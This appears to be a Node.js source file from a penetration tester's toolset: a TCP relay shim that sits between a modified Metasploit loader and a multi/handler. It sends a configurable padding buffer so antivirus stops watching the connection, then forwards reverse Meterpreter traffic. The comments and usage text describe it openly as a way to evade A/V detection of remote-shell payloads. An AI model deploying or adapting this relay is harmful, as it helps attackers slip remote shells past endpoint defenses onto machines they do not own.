//
// Sometimes A/V (or similar defensive tools) will monitor the
// preamble for network connections and compare with signatures.  In
// the case of meterpreter, this means that even using Mudge's
// metasploit-loader, A/V will still stop the meterpreter.  
//
// I suppose that encoding the meterpreter would probably help, except
// that I'm pretty sure there'll still be a detectable decoder, so
// relying on metasploit alone will not be a future-proof solution.
//
// This approach pairs a modified loader with the following shim.
// This shim is basically a TCP relay, but with capacity of adding
// obfuscatory logic to the process.  When the modified loader
// connects, this will send 64kb of "garbage" to get past the window
// in which A/V is monitoring the connection.  Then the sockets are
// handed over to a basic relay to connect the loader to the
// multi/handler.
//
// Doing it this way provides a useful foundation for other forms of
// obfuscation, should we need to do so in the future.  This is
// very... "pragmatic" code, so I wouldn't say it's really clean.
// Nevertheless, it's proven useful in two assessments so far, so it's
// joining my toolset.
//
// Author: Josh Stone
// Date:   2014-10-15
//

var net = require("net");
var out = require("./out.js");

if(process.argv.length != 7) {
    out.blue("");
    out.blue("usage: node delayloader.js <bind> <lport> <dest> <dport> <numbytes>");
    out.blue("");
    out.blue("delayloader will listen on <bind>:<lport> and relay the connection to");
    out.blue("a multi/handler at <dest>:<dport>.  You will need the appropriately");
    out.blue("modified loader.  This will evade some A/V that watches network");
    out.blue("connections for an MSF payload.  This shim adds a 64kb buffer of");
    out.blue("nondescript content to fool A/V, which gives up after a relatively");
    out.blue("short amount of traffic.");
    out.blue("");
    process.exit(1);
}

var bind = process.argv[2];
var lport = process.argv[3];
var dest = process.argv[4];
var port = parseInt(process.argv[5]);

out.blue("Binding to " + bind);
out.blue("Connecting to " + dest + ":" + port);

client = net.createServer(function(sock) {
    out.cyan("Client " + sock.remoteAddress + ":" + sock.remotePort + " connected");

    var padding = new Buffer(parseInt(process.argv[6]));
    sock.write(padding);

    sock.pause();
    out.cyan("Connecting to server");
    var server = net.connect({port: port, host: dest}, function() {
        out.cyan("Assigning server handlers");
        server.on('data', function(buffer) {
            out.green("server data forward");
            sock.write(buffer);
        });
        server.on('error', function() {
            out.red("ERROR encountered for server socket");
        });
        out.cyan("Assigning client handlers");
        sock.on('data', function(buffer) {
            out.darkgreen("client data forward");
            server.write(buffer);
        });
        sock.on('error', function() {
            out.red("ERROR encountered for client socket");
        });
        out.cyan("Resuming client socket");
        setTimeout(function(s) { s.resume(); }, 10000, sock);
    });
});

client.listen(lport, bind, function() {
    out.red("Interception server bound to " + bind + ":" + lport);
    out.red("Relaying inbound reverse meterpreters to " + dest + ":" + port);
});
